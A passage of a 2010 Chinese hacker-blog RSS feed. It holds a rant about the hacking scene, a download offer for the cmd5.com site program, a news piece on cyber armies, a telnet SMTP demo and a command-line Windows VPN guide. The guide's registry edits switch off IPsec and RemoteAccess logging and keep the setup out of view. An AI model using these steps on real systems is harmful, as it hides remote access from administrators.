/>不,方向是有的,只是努力错了吧.看到安全栏目那块,和其他板块相比,很明显我就是个网络安全的,有句话说得好,只有了解安全,才会懂得防御,但是任何计算机的防御都逃不过oday,比如上次的dz7.17.2洞,有大概10w个站遭到入侵.如果7.0也有的话,那么抗生也不要做了,直接挂.和之前dede洞有得比,群里当时还有人在卖dzday,开价3000,我也不多说了,转行挖洞好了.</p><p><br />国内的hack市场很奇妙,收徒弟,拜师,刷钻,日站,抓鸡,中国的计算机早成了挂鸡大国和傀儡国了,国外就纯技术,一堆的原创分析资料丢来丢去,学术环境很高,最近的土耳其黑客不是很鄙视中国吗?黑了直接挂首页,很屌不?当我们还停留在抓鸡和刷钻种马,人家的级别已经去到了乱日级别了.所以说要有大师的思想,学习是一种态度,包括做人,土耳其那家伙是人品低了点,呵呵..<br />很多大牛都是自己有一套工具,自己挖一手oday,估计微软很多洞子都还没公开,仅在少数人的手上.</p><p><br />本神刀网不仅关注网络安全,还会有其他,溜客网的站长说,我们不与博客类型链接,其实学习岂在分类论坛门户与博客,只要有学习的气氛够了,都一个样.不过也难怪,中国做站很难,特别是黑客站,一不小心,一堆人来路站了,还办班收学生vip500一个终身,是网站的终身吧,黑鹰就是一个例子了,呵呵..苦笑呀.</p><p><br />学习带急功近利的心态肯定学不好到精通,只会到了照猫画虎程度就沾沾自嘻了,不学则已,要学就学精,这句话送给大家.谦虚,就算买了vip也要对待得起你们妈咪,哥路过的..</p><p><br />...中国这个<span style="background-color: #000000">黑客</span>怎么那么奇怪呢?...</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1092.html" target="_blank">继续阅读《白开水的自白》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=4">技术研究作坊</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%AB%99">网站</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1092.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1094.html">使用ASPJPEG添加水印的方法</a>&nbsp;&nbsp;(2010-1-24 13:22:49)</p><p><a  href="http://www.nhs8.com/post/1004.html">一个技巧的SEO优化方案</a>&nbsp;&nbsp;(2010-1-20 3:22:21)</p><p><a  href="http://www.nhs8.com/post/997.html">zblog代码修改介绍</a>&nbsp;&nbsp;(2010-1-20 3:0:59)</p><p><a  href="http://www.nhs8.com/post/996.html">zblog修改简单教程</a>&nbsp;&nbsp;(2010-1-20 2:58:40)</p><p><a  href="http://www.nhs8.com/post/995.html">z-blog-自动加入版权信息代码</a>&nbsp;&nbsp;(2010-1-20 2:55:52)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>技术研究作坊</category><comments>http://www.nhs8.com/post/1092.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1092</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1092&amp;key=d7d6030e</trackback:ping></item><item><title>cmd5.com整站程序下载 如假包换md5</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1091.html</link><pubDate>Sun, 24 Jan 2010 12:04:40 +0800</pubDate><guid>http://www.nhs8.com/post/1091.html</guid><description><![CDATA[<p>鄙视那些收钱的！</p><p>环境自己搭，DLL自己反。<br /><br />收点钱 ，来的不容易 。<br /><br />觉得不值得大牛可以不下， 嘴下留情了， 谢谢。<br /><br /><span id="attach_4277" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})" style="display: none; position: absolute"><img src="http://www.nhs8.com/upload/201001241206401704.gif" border="0" alt="" /></span> <img class="zoom" id="aimg_4277" onclick="zoom(this, this.src)" alt="1111111.jpg" src="http://www.nhs8.com/upload/201001241206402528.jpg" width="600" status="2" unselectable="true" outfunc="null" initialized="true" file="attachments/month_1001/1001240846c96efc0d43c39a83.jpg" /></p><p>&nbsp;</p><p>下载地址：<a href="http://www.nhs8.com/upload/201001241206064205.rar" target="_blank">201001241206064205.rar</a></p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1091.html" target="_blank">继续阅读《cmd5.com整站程序下载 如假包换md5》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1091.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p><p><a  href="http://www.nhs8.com/post/1083.html">CMD下建立VPN</a>&nbsp;&nbsp;(2010-1-23 21:9:2)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1091.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1091</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1091&amp;key=07030595</trackback:ping></item><item><title>美印恶炒中国有30万网络大军 破坏力极大</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1090.html</link><pubDate>Sun, 24 Jan 2010 11:56:47 +0800</pubDate><guid>http://www.nhs8.com/post/1090.html</guid><description><![CDATA[<p align="center">大家可以分析下，美国为啥要这样做？</p><p align="center"><img alt="美印恶炒中国有30万网络大军 堪比大规模武器" src="http://www.nhs8.com/upload/201001241157345233.jpg" /></p><p class="pictext" align="center">美国《时代》杂志曾推出关于&ldquo;网络战&rdquo;的封面文章</p><p>　　2010年1月12日，美国谷歌公司以遭到中国黑客攻击为由威胁退出中国。1月14日，印度媒体也抛出了&ldquo;印度总理办公室受到中国黑客攻击&rdquo;的报道，甚至声称中国组建了一支30万人的网络大军，用以侵入其他国家的网络。</p><p>　　对于这些指责，中国政府均已予以否认。但美国国防部长盖茨20日访问印度时，美印官员仍声称中国可能成为两国的&ldquo;网络敌人&rdquo;，美国更准备扶持印度制衡&ldquo;网敌&rdquo;中国。</p><p>　　中国国家互联网应急中心有关官员22日指出，中国已成为网络攻击最大的受害国。事实上，对于高度依赖信息化、网络化技术的西方国家而言，大多建有十分专业的&ldquo;黑客部队&rdquo;，其中尤以美国为最，印度也不例外。美印闭口不提自己的黑客部队，却不断恶炒所谓中国黑客，显然是在为自己组建&ldquo;网军&rdquo;、将网络用于政治目的寻找借口。</p><p>　　<strong>&ldquo;中国黑客侵入印总理办公室&rdquo; </strong></p><p>　　<strong>印媒妄称中国有30万网军 </strong></p><p>　　1月14日，《今日印度》报纸网站在其&ldquo;今日头条&rdquo;栏目刊发了一篇题为&ldquo;中国黑客的目标是(印度)总理办公室&rdquo;的文章，文章声称，中国黑客于2009年12月左右，开始攻击印度总理办公室30多名要人的电脑。报道称，目前印度安全机构组成的调查组正在评估黑客身份，并将确定是否是中国政府指派的间谍所为。</p><p>　　报道还大肆渲染中国组建的所谓&ldquo;网络部队&rdquo;。印度网络法规和IT业行动委员会主席帕万杜加尔甚至说，中国已经组建了一支大约30万人的网络部队，唯一的工作就是侵入他国的安全网络。因此，每个国家都必须建立网络部队以遏制中国。曾从事间谍活动的印度研究与分析局前官员辛格称，中国的网军不仅包括穿制服的军人，也包括其他人，可能也有学生在内。</p><p>　　<strong>&ldquo;破坏力不逊大规模杀伤性武器&rdquo; </strong></p><p>　　<strong>美FBI鼓吹中国网络威胁论 </strong></p><p>　　美国在线媒体&ldquo;每日野兽&rdquo;近日报道说，据美国联邦调查局(FBI)的一份机密报告认为，中国已经组建了一支超过18万人的网络军队，目标是在2020年建立世界第一支&ldquo;信息化武装的部队&rdquo;。</p><p>　　这份报告评估称，中国军队中现有3万多名网络特工，还有15万民间电脑高手。他们的任务是窃取美国的军事和科技情报，同时具有摧毁美国关键基础设施、入侵银行和商业网络、危及敏感军事和国防资料库的潜在能力。</p><p>　　<strong>FBI评估认为，中国在网络战场上的技术突破能力已经领先于其他国家。</strong>源自中国的网络攻击足以对美国的经济、电信、电网和军事准备造成实质性的破坏，一次大规模的网络攻击可能达到&ldquo;大规模杀伤性武器的破坏级别&rdquo;。</p><p>　　<strong>中国是网络攻击最大受害国 </strong></p><p>　　事实上，中国的信息网络也面临着境外黑客攻击的严重威胁。而美国则是发动网络攻击最频繁的国家。</p><p>　　<strong>中国是黑客攻击最大受害国 </strong></p><p>　　国家互联网应急中心(CNCERT)运行部副主任周勇林22日接受采访时指出，我国已成为网络攻击最大的受害国。周勇林介绍说，目前网上有成百上千万的计算机感染了木马或僵尸程序，并被各种各样的黑客暗中控制，成为所谓的&ldquo;肉机&rdquo;。2009年我国境内被木马程序控制的主机IP数量为26.2万个，境外有近16.5万个主机地址参与控制这些计算机，其中来自美国的占16.61%，排名第一；2009年我国境内被僵尸程序控制的主机IP数量为83.7万个，境外有1.9万个主机地址参与控制这些计算机，其中来自美国的占22.34%，排名第一。</p><p>　　美国Symantec公司(注：全球最大的网络安全公司)2008年互联网安全威胁报告中指出，网络攻击源的数量美国居世界第一位，占世界总量的25%；位于美国的僵尸控制服务器数量居世界首位，占世界总量的33%，远远超出世界上任何一个其他国家。</p><p>　　<strong>美情报机构攻击中国是常事 </strong></p><p>　　美国政府经常将网络用于政治目的。包括拦截信息，搜集情报；输出美国价值观；支持&ldquo;颜色革命&rdquo;；扶持所谓&ldquo;敌对&rdquo;国家和&ldquo;看不顺眼&rdquo;国家的反对派；战时先发制人，干扰对方通讯和指挥系统等。</p><p>　　据美国&ldquo;每日野兽&rdquo;网站在相关报道中指出，尽管没有一名美国官员承认，但美国国防部、中央情报局以及美国国家安全局都在常规性地攻击中国军事和工业领域的计算机网络，以获取多年前只能由职业间谍才能得到的情报。而一旦与中国发生冲突，美国及其欧洲盟友会尝试破坏中国电脑网络、制造一些麻烦。</p><p>　　<strong>美斥巨资煽动蛊惑中国网民 </strong></p><p>　　据香港某传媒报道，美国情报机构每年出资数千万美元对中国网民进行思想渗透、策反。他们出没于各大中文论坛、门户网站。&ldquo;哲瓦在线&rdquo;就是由美国官方机构和海外&ldquo;藏独&rdquo;组织合作进行的秘密项目。</p><p>　　据报道，&ldquo;哲瓦在线&rdquo;的任务是，利用互联网对中国网民进行煽动、蛊惑、渗透、策反，制造谣言引发动乱并搜集中国情报。一名曾在&ldquo;哲瓦在线&rdquo;工作的藏族青年醒悟后揭露说，这个组织就是一个听命于美国的网络间谍机构，拿美国人的钱，受美国人监督，并为美国人服务。</p><p>　　香港大公报发表的《防美日网间舆论扰华》一文之中也称，经常在网上发表敏感文章的人背景不简单，他们受雇于美日间谍机构。</p><p>　　<strong>综合新华社、《环球视野》 </strong></p><p>　　<strong>网络战争 也许就在今天 </strong></p><p>　　在好莱坞电影《虎胆龙威4》里，恐怖分子利用电脑黑客编写的程序，控制了交通网络、股市、电视广播和电力网络，股市交易瘫痪、中断电力供应、制造白宫被炸的假象，甚至&ldquo;遥控&rdquo;战斗机机师攻击片中男主角布鲁斯威利。</p><p>　　这部电影触动了人们的隐忧。过去十年，美国人最担心控制一切的国家网络被骑劫，飞机因失去控制突然从天而降，大坝水闸突然开启淹没万亩良田和城市，发电站发生爆炸，电力网络被阻断。值得庆幸的是，这些事情都不曾发生。</p><p>　　<strong>&ldquo;网络威慑&rdquo;是新的&ldquo;核威慑&rdquo; </strong></p><p>　　不过，各国政府早已为这些潜在风险作准备。从美国到欧洲，再到东亚，世界各国开始加强网络战的攻防实力。或者更准确地说，各国基于核威慑概念，开始构建各自的&ldquo;网络威慑&rdquo;。</p><p>　　美国战略与国际研究中心曾指出，建立强大的网络攻击实力，是阻吓对手发动攻击的有效方法之一。然而，这种大规模的网络战就像核武器一样，不能轻易使用。因为很可能招致对方的传统军事打击，或者殃及自己和盟国。但是在一定范围内，网络战争已经悄悄打响。</p><p>　　<strong>首场网络战演兵爱沙尼亚 </strong></p><p>　　2007年4月26日晚上10时左右，在没有任何预兆的情况下，爱沙尼亚政府网站突然被电子信息淹没。尽管有防火墙、额外服务器和人员应付这类突发性事件，但防线还是遭攻破，攻击次数呈指数式增长。国会电邮服务器是最先遭殃的网络设施之一。被攻击的目标迅速增加到好几百个，包括政府、银行、新闻媒体和大学的网站。5月18日出现最后一波攻击后，这一场网络战才逐渐平息下来。</p><p>　　这场大规模网络袭击的起因，是爱沙尼亚政府把地处首都塔林的苏军解放塔林纪念碑搬迁。爱沙尼亚方面声称，这场攻击已超出一般黑客的能力，指控俄罗斯政府参与其事，但俄罗斯政府对此予以否认，只是说一些俄罗斯个人和组织参与了这次袭击。</p><p>　　事实上，美国也在2007年开始在伊拉克的反恐战争中动用网络手段对付叛乱分子，而且取得不错的成效。叛乱分子的通信系统遭美军控制，许多叛乱分子被蒙蔽及诱骗，纷纷被捕或遭击毙。</p><p>　　2008年，俄罗斯在南奥塞梯战事中挥军格鲁吉亚时，格鲁吉亚的网络也遭到攻击。不过，俄罗斯否认曾发动网络攻击。</p><p>　　2009年美国独立日当天，美国和韩国先后发生了疑为朝鲜发动的网络战。本报综合报道 李珊</p><p>　　<strong>各国&ldquo;网军&rdquo;大揭秘 </strong></p><p>　　●美国 目前拥有最大的网络战力量，三军都有网络部队。早在2002年，美军就组建了世界上第一支网络黑客部队&mdash;&mdash;&mdash;网络战联合功能构成司令部(简称JFCCNW)。这支部队由世界顶级电脑专家和&ldquo;黑客&rdquo;组成，其人员组成包括美国中央情报局、国家安全局、联邦调查局以及其他部门的专家，所有成员的智商都在140分以上，因此被戏称为&ldquo;140部队&rdquo;。</p><p>　　●英国英国军情六处早在2001年就秘密组建了一支由数百名计算机精英组成的黑客部队。有报道称该部队吸收了大量有前科的民间黑客。从机构设置看，英军主要将网络战应用于情报领域。</p><p>　　●日本日本防卫省已经组建了一支约5000人的网络战部队，主要任务是进行反黑客攻击，同时研制开发可破坏其他国家网络系统的跨国性&ldquo;网络武器&rdquo;，必要时可对敌方重要网络实施&ldquo;瘫痪战&rdquo;。</p><p>　　●印度印军在陆军总部建立了网络安全部门，并在所有军区和重要军事部门建立网络安全分部。据悉，印度还对军校学员进行&ldquo;黑客技术&rdquo;培训，课程集中在&ldquo;获取情报和反网络刺探&rdquo;上，并宣称&ldquo;谁从事黑客活动谁就会赢得战争&rdquo;。</p><p>　　●朝鲜据美国和韩国媒体称，朝鲜网络战部队目前拥有100多名成员。该部队任务是入侵敌方军事机构电脑网络，盗窃资料，在必要情况下散布电脑病毒，瘫痪其网络。随着朝鲜黑客部队能力增强，其目标已转向发动网络战争。</p><p>　　●伊朗 伊朗官方称，&ldquo;伊朗网军&rdquo;是民间组织，也经常&ldquo;黑&rdquo;伊朗政府的网站。而美国媒体称，&ldquo;伊朗网军&rdquo;是个人或者组织的联合，是伊朗政府进行网络战的工具。</p><p>　　除此之外，俄罗斯、以色列等国也都十分重视&ldquo;黑客部队&rdquo;，大量军民领域网络精英正在成为未来网络战的后备军。</p><p>　　<strong>中国网络战研究专家张召忠&mdash;&mdash; </strong></p><p>　　<strong>中国不会无端&lsquo;网攻&rsquo;他国 </strong></p><p>　　国防大学教授、著名军事专家张召忠少将，曾多年从事网络战研究，以下是他对网络战的相关解读。</p><p>　　网络战作为一种战争形态和具体的作战样式，无时无刻不在世界的网络当中进行作战。这个作战分成几个领域。一个是相对独立的军队的网络，军队的网络是和网络攻击、黑客攻击、电子战、信息战在一块的。还有一个网络是公开的因特网，作战空间是跨越国界、跨越时空的，如果出现问题，对每一个人和国家要害部门的安全存在很大危险，比如说民航部门、银行系统、保险系统和股市等。所以说大家都依赖网络的时候，网络的危险性也在增加。</p><p>　　现在的网络战，我管它叫战略的网络战，它是跨越时空跨越国界的，你很难找到它是从哪个地方对你发动的攻击，也很难找到发动攻击的这个人是谁，有可能是军人，也可能是老百姓，可能是成人，也可能是个孩子。还有，网络产品大部分都是美国日本等西方国家研制的，其他国家都对他越来越依赖，他有权力、有技术手段去检查你的东西。</p><p>　　不管是一个国家，还是一个个人，如果在和平时期无端地去攻击另外一个国家的政府网站或者攻击任何一个个人的网站，这都是违法的行为，这和恐怖袭击没什么两样，我们中国不会做这个事情。但是西方为了从政府获得一笔资金，为了能够建立自己的网络部队，为了能够树立自己的一个敌人，经常散布中国网络威胁论，这是值得警惕的。据中国广播网</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1090.html" target="_blank">继续阅读《美印恶炒中国有30万网络大军 破坏力极大》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1090.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p><p><a  href="http://www.nhs8.com/post/1083.html">CMD下建立VPN</a>&nbsp;&nbsp;(2010-1-23 21:9:2)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1090.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1090</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1090&amp;key=ba07747b</trackback:ping></item><item><title>telnet到163邮箱发信</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1084.html</link><pubDate>Sat, 23 Jan 2010 23:05:55 +0800</pubDate><guid>http://www.nhs8.com/post/1084.html</guid><description><![CDATA[<p>最近网易163/126/yeah邮箱全面打开SMTP/POP了，现在测试telnet到smtp服务器进行发信<br /><br /><table style="border-collapse: collapse" bordercolor="#999999" cellspacing="0" cellpadding="0" width="95%" bgcolor="#f1f1f1" border="1">    <tbody>        <tr>            <td>            <p style="margin: 5px; line-height: 150%"><code><span style="color: rgb(0,0,0)"><font face="新宋体">[root@kindle ~]# telnet smtp.163.com 25<br />            Trying 123.125.50.133...<br />            Connected to smtp.163.com (123.125.50.133).<br />            Escape character is '^]'.<br />            EHLO 163.com<br />            220 163.com Anti-spam GT for Coremail System (163com[20090903])<br />            250-mail<br />            250-PIPELINING<br />            250-AUTH LOGIN PLAIN<br />            250-AUTH=LOGIN PLAIN<br />            250-coremail 1Uxr2xKj7kG0xkI17xGrUDI0s8FY2U3Uj8Cz28x1UUUUU7Ic2I0Y2UrHMAyqUCa0xDrUUUUj<br />            250 8BITMIME<br />            AUTH LOGIN&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #登录认证<br />            334 dXNlcm5hbWU6<br />            a2luZGxlbGFpbA==&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #base64加密的用户名 这里是kindlelail<br />            334 UGFzc3dvcmQ6<br />            MTIzNDU2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #base64的密码 这里是123456<br />            235 Authentication successful<br />            mail from:&lt;<a href="mailto:kindlelail@163.com">kindlelail@163.com</a>&gt;<br />            250 Mail OK<br />            rcpt to:&lt;<a href="mailto:kindlelail@163.com">kindlelail@163.com</a>&gt;<br />            250 Mail OK<br />            data<br />            354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;<br />            rcpt to:&lt;<a href="mailto:linuxroorkits@gmail.com">linuxroorkits@gmail.com</a>&gt;</font></span></code></p>            <p style="margin: 5px; line-height: 150%"><code><span style="color: rgb(0,0,0)"><font face="新宋体">from:&lt;<a href="mailto:kindlelail@163.com">kindlelail@163.com</a>&gt;<br />            to:&lt;<a href="mailto:kindlelail@163.com">kindlelail@163.com</a>&gt;</font></span></code></p>            <p style="margin: 5px; line-height: 150%"><code><span style="color: rgb(0,0,0)"><font face="新宋体">subject:</font></span></code></p>            <p style="margin: 5px; line-height: 150%"><code><span style="color: rgb(0,0,0)"><font face="新宋体">hello kindle!!!<br />            .<br />            250 Mail OK queued as smtp3,DdGowKArD1jIqFpLQNscBA--.23003S2 1264232723<br />            Connection closed by foreign host.<br />            </font></span></code></p>            </td>        </tr>    </tbody></table><br /><br /><br /><table style="border-collapse: collapse" bordercolor="#999999" cellspacing="0" cellpadding="0" width="95%" bgcolor="#f1f1f1" border="1">    <tbody>        <tr>            <td>            <p style="margin: 5px; line-height: 150%"><code><span style="color: rgb(0,0,0)"><font face="新宋体">[root@kindle ~]# python<br />            Python 2.4.3 (#1, Jun 11 2009, 14:09:58)<br />            [GCC 4.1.2 20080704 (Red Hat 4.1.2-44)] on linux2<br />            Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.<br />            &gt;&gt;&gt; import base64<br />            &gt;&gt;&gt; base64.encodestring('kindlelail')<br />            'a2luZGxlbGFpbA==\n'<br />            &gt;&gt;&gt; base64.encodestring('123456')<br />            'MTIzNDU2\n'</font></span></code></p>            </td>        </tr>    </tbody></table><br />只要发送标准的smtp协议就可以发信了，不过用户名和密码都是需要输入加密后的字符。</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1084.html" target="_blank">继续阅读《telnet到163邮箱发信》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1084.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1083.html">CMD下建立VPN</a>&nbsp;&nbsp;(2010-1-23 21:9:2)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1084.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1084</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1084&amp;key=2ff44c16</trackback:ping></item><item><title>CMD下建立VPN</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1083.html</link><pubDate>Sat, 23 Jan 2010 21:09:02 +0800</pubDate><guid>http://www.nhs8.com/post/1083.html</guid><description><![CDATA[<p>作者：守护天使<br /><br />1.前提<br />服务里 windows防火墙停止（或者麻烦点可以把router协议，端口1723配进去）<br />远程注册表服务必须开启<br />server服务必须开启<br />router路由服务必须开启<br /><br />两块以上网卡的win2000做vpn很方便，添加nat协议后，客户端拨入，能够使用远程网络连接internet。 使得部分客户端可提高网络速度，并达到代理的作用。<br /><br />一块网卡的winxp，win2003做类似的vpn仍然很方便，nat协议添加后，再添加两个接口，一个是本地连接，一个是内部，设置本地连接为全转发，内部为私有模式，既可让有权限的用户拨入。<br /><br />一块网卡的win2000，做类似的vpn就不方便了，nat协议添加后，再添加接口，只可以添加上本地连接，内部不容许图形界面的添加，察看了netsh dump &gt;c:\1.txt后，尝试在netsh命令添加内部接口，通过。 命令为：netsh routing ip nat add interface 内部 private<br /><br />下面是部分常用命令：<br /><br />netsh ras set user username permit //设置用户授权，该用户不能为tsinternetuser support_388945a0等。<br /><br />netsh ras ip set addrassign pool //设置静态地址池模式<br /><br />netsh ras ip add range 10.0.0.1 10.0.0.100 // 设置静态池范围 ，要用标准的局域网地址，避免将来在访问internet时候地址转发错误。<br /><br />netsh routing ip nat install //添加nat协议<br /><br />netsh routing ip nat add interface 本地连接 full //添加nat接口本地连接全转发<br /><br />netsh routing ip nat add interface 内部 private //添加nat借口内部私有模式<br /><br />igmp同样可以在netsh配置，命令行很长：<br /><br />netsh routing ip igmp install<br /><br />netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV2 ifenabled=enable robustvar=2 startupquerycount=2 startupqueryinterval=31 genqueryinterval=125 genqueryresptime=10 lastmemquerycount=2 lastmemqueryinterval=1000 accnonrtralertpkts=YES<br /><br />netsh routing ip igmp add interface name=&quot;本地连接&quot; igmpprototype=IGMPPROXY ifenabled=enable<br />如果配置前已经有接口，就要先删除：<br /><br />netsh routing ip igmp delete interface 内部 //与此类似<br /><br />路由和远程访问服务会在系统、安全日记中记录不少信息，比如ipsec、登陆信息。<br /><br />修改一下注册表可以避免：<br /><br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters<br /><br />ProhibitIPsec&quot;=dword:00000001<br /><br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters<br /><br />LoggingFlags&quot;=dword:00000000<br /><br />现在除了登陆信息，ipsec,remoteaccess警告，已经不记录。<br /><br />----------------------------------------<br /><br />还有值得一提的是建立好地vpn，通常使用的都是pptp协议，tcp1723端口，如果我们在网卡的ip策略添加了tcp1723的容许条目，基本上可以拨入。为什么是基本呢，因为pptp除了 tcp1723外还有一个ip47号协议，不同于tcp不同于udp，此协议对于认证很重要。如果网络上的防火墙割断的话，会出现拨号-&gt;用户认证 -&gt;不通过认证断开的问题。<br /><br />在配置vpn的时候，还需要remoteregister服务的支持，建立好以后可以关掉。<br /><br />workstation , server,rpc同样在配置时候需要。<br /><br />----------------------------------------<br /><br />经测试，全命令行的建立vpn后，rrasmgmt.msc不出现具体配置信息。也就是说只有看网络连接文件夹，才能看出来一个拨入的连接。貌似隐蔽，比较见鬼。</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1083.html" target="_blank">继续阅读《CMD下建立VPN》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1083.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1096.html">在T00LS原来的号被社了</a>&nbsp;&nbsp;(2010-1-24 15:47:23)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1083.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1083</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1083&amp;key=5d799fe2</trackback:ping></item><item><title>ECSHOP 2.6 